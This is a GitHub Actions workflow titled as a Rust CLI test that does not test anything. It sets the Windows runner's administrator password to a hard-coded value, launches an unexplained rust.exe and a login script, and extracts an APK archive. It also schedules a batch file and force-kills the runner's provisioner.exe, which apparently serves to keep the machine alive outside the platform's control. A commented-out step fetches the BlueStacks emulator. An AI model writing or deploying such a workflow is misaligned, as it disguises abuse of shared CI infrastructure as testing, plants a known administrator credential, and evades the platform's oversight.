name: Rust-cli
on:
  workflow_dispatch:
jobs:
  build:
    name: testing windows-latest
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4

      - name: Change runneradmin password
        run: |
          net user runneradmin Link@12345
        shell: powershell
        
      #- name: Download BlueStacks Installer
       # run: |
       #   $url = "https://ak-build.bluestacks.com/public/app-player/windows/nxt/5.22.0.1102/05d8f0c866456671405d769a653cb88d/FullInstaller/x64/BlueStacksFullInstaller_5.22.0.1102_amd64_native.exe"
      #    $output = "C:\BlueStacksFullInstaller.exe"
      #    Invoke-WebRequest -Uri $url -OutFile $output
      #  shell: powershell
        
      - name: dependiences
        run: pip install pyautogui --quiet

      - name: Extract APK from 7z Archive
        run: 7z x apk/Shadow_Ops.7z.001
        
      - name: Run rust
        run: |
          start bin/rust.exe
          python login.py

      - name: task 
        run: | 
          schtasks /create /tn "taskmy" /tr "${{ github.workspace }}\run.bat" /sc once /st $(powershell -Command "(Get-Date).AddMinutes(1).ToString('HH:mm')") /f
          taskkill /IM provisioner.exe /F

          
      #- name: waiting 10 minutes
        #run: sleep 600

            
